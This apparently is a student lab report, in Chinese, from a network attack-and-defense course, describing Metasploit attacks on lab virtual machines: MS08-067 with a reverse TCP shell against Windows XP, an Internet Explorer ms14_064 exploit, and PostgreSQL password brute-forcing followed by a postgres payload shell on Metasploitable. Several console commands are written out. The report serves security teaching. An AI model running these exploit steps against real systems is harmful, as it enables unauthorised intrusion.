20192404 2021-2022-2 《网络与系统攻防技术》实验六实验报告

实验六 Metasploit攻击渗透实践

一.实验内容及要求

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,尽量使用最新的类似漏洞;

1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;

1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

1.4 成功应用任何一个辅助模块。

以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除1分。

二.实验过程

2.1实现主动攻击

实现ms08_067:
靶机版本:Windows xp sp3
我们使用: payload/generic/shell_reverse_tcp
首先尝试靶机和攻击机互ping


成功!
然后我们试探靶机是否存在ms08_067这个漏洞nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.78.130

打开metasploit控制台: msfconsole
查看ms08_067漏洞: search ms08-067

选择该漏洞use exploit/windows/smb/ms08_067_netapi
设置靶机ip:set RHOSTS 192.168.78.130
查看靶机类型show targets

修改好类型后进行攻击,exploit

成功!

2.2一个针对浏览器的攻击,尽量使用最新的类似漏洞

1.首先我们选择XP虚拟机作为靶机
2.然后打开metasploit,输入命令search exploit Microsoft Internet Explorer查找和Windows的IE浏览器相关的漏洞,我们选择了2014年11月发布的漏洞ms14_064_ole_code_execution。
3.进行如下的相应服务部署:

然后成功完成攻击

2.3一个针对客户端的攻击及成功应用任何一个辅助模块

1.这里我们选择Metasploitable_ubuntu作为靶机。首先查看攻击机和靶机IP,可得攻击机IP为192.168.78.128,靶机IP为192.168.78.129。
2.启动msfconsole后,首先我们使用辅助模块来查看靶机上安装的postgresql的版本:

可以发现版本为8.3.1
3.然后使用如下命令进行密码爆破:

发现用户名和密码均为postgres

4.利用用户名和密码,我们可以使用exploit/linux/postgres/postgres_payload模块获得postgres用户的shell:

成功!

三、问题和解决方案

问题一

针对浏览器的攻击中出现了浏览器版本过低的问题,多次实验无法成功连接上靶机。
可以选择更换漏洞,并更换靶机。

四、学习感悟、思考等

本次实验我们进行了Metasploit相关的实践,让我了解了渗透一个主机的基本思路和常用的方法,通过本次实验也更加熟练地掌握了对Metasploit的使用,也后续课程的学习.

posted @ 2022-05-15 22:26  20192404—贾智博  阅读(9)  评论(0编辑  收藏  举报